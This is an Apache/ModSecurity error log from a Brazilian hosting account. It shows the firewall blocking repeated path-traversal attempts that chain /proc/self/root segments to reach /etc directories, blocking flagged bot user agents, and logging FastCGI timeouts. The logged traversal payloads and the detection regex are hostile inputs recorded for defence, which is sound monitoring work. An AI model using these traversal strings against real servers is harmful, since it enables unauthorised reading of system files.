[Thu Mar 19 09:04:52.137937 2026] [:error] [pid 19093:tid 140411590858496] [client 74.7.244.43:38852] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvmZF_V7PWP6ixUYl6vkgAAApI"]
[Thu Mar 19 09:05:14.129800 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39854] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:05:41.218738 2026] [proxy_fcgi:error] [pid 27293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:40592] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:06:03.129822 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41158] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:06:25.049824 2026] [proxy_fcgi:error] [pid 19093:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41754] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:06:33.334876 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.243.128:37710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvmyQbLMZ6AikZjR9VP3gAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:06:47.125858 2026] [proxy_fcgi:error] [pid 17653:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:42348] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:06:48.606514 2026] [:error] [pid 19093:tid 140411548894976] [client 74.7.243.128:59564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvm2F_V7PWP6ixUYl6vxAAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:07:11.147126 2026] [proxy_fcgi:error] [pid 31803:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42994] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:07:32.983256 2026] [mime_magic:error] [pid 19093:tid 140411741927168] (70014)End of file found: [client 74.7.243.128:55300] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/spool/postfix
[Thu Mar 19 09:07:33.133862 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:43638] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:07:40.828090 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.228.61:44448] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvnDAbLMZ6AikZjR9VQFgAAABY"]
[Thu Mar 19 09:07:54.041496 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:33670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvnGgkwaGbbGflqUZCxUAAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:07:54.125789 2026] [proxy_fcgi:error] [pid 27403:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44092] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:08:16.745836 2026] [proxy_fcgi:error] [pid 27403:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44496] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:08:40.485784 2026] [proxy_fcgi:error] [pid 19093:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:44912] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:08:43.221164 2026] [core:alert] [pid 30077:tid 140411599251200] [client 57.141.18.45:46874] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:09:07.454590 2026] [mime_magic:error] [pid 26799:tid 140411607643904] (70014)End of file found: [client 57.141.18.85:46792] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:09:09.184010 2026] [mime_magic:error] [pid 17653:tid 140411624429312] (70014)End of file found: [client 57.141.18.60:47526] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:09:12.137778 2026] [proxy_fcgi:error] [pid 17887:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:45582] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:09:23.658962 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.243.128:54214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvnc8df6f5d65gmYZRosQAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:09:44.125811 2026] [proxy_fcgi:error] [pid 17653:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:46268] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:09:57.862926 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.244.43:46742] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvnlQbLMZ6AikZjR9VQdgAAAAY"]
[Thu Mar 19 09:10:06.633984 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.243.128:46484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvnngbLMZ6AikZjR9VQdwAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:10:14.131436 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:46900] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:10:34.456291 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:46274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvnuuyqAr6etmhZHNpVOgAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:10:43.129797 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47512] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:10:48.652109 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:49254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvnyNa6ubjKNq_cu4ZCNwAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 09:11:10.125798 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48132] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:11:41.129812 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48798] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:11:48.522073 2026] [core:alert] [pid 27403:tid 140411691570944] [client 57.141.18.14:51012] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:12:03.125811 2026] [proxy_fcgi:error] [pid 27403:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:49308] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:12:25.129806 2026] [proxy_fcgi:error] [pid 30077:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:49818] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:12:34.671664 2026] [mime_magic:error] [pid 17887:tid 140411565680384] (70014)End of file found: [client 57.141.18.84:52090] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:12:42.750357 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.228.61:57218] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvoOgkwaGbbGflqUZCx_AAAAM0"]
[Thu Mar 19 09:12:42.997806 2026] [mime_magic:error] [pid 30077:tid 140411624429312] (70014)End of file found: [client 74.7.243.128:49868] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/lib/firewalld
[Thu Mar 19 09:12:42.998235 2026] [access_compat:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:49868] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/lib/firewalld
[Thu Mar 19 09:12:48.129859 2026] [proxy_fcgi:error] [pid 27293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50494] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:13:10.117847 2026] [proxy_fcgi:error] [pid 17887:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51022] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:13:32.133788 2026] [proxy_fcgi:error] [pid 27403:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:51486] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:13:36.516505 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.243.128:52788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvocAbLMZ6AikZjR9VQ_AAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 09:13:41.702416 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.243.128:44006] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvodfu8EFLIOrSqIpuYYAAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 09:13:59.937813 2026] [proxy_fcgi:error] [pid 27403:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52094] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:14:13.304444 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:46998] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvoleoXxyEfFpUF8f8CxAAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 09:14:22.133807 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52726] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:14:44.413825 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:53186] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:15:03.277919 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.244.43:54528] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvoxvu8EFLIOrSqIpuYgwAAAlM"]
[Thu Mar 19 09:15:09.121780 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:53704] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:15:14.398072 2026] [mime_magic:error] [pid 15826:tid 140411699963648] (70014)End of file found: [client 57.141.18.35:55510] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:15:38.126048 2026] [proxy_fcgi:error] [pid 17653:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54260] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:15:49.915076 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.243.128:47006] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvo9RkFeYa1D6dYQnDkCAAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 09:16:03.062950 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.243.128:36108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvpAgbLMZ6AikZjR9VRVQAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 09:16:05.125808 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:54832] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:16:34.693959 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55518] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:16:49.523615 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:47120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvpMcdf6f5d65gmYZRqCQAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 09:17:03.045802 2026] [proxy_fcgi:error] [pid 27293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56164] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:17:32.153848 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56938] AH01075: Error dispatching request to : (polling)
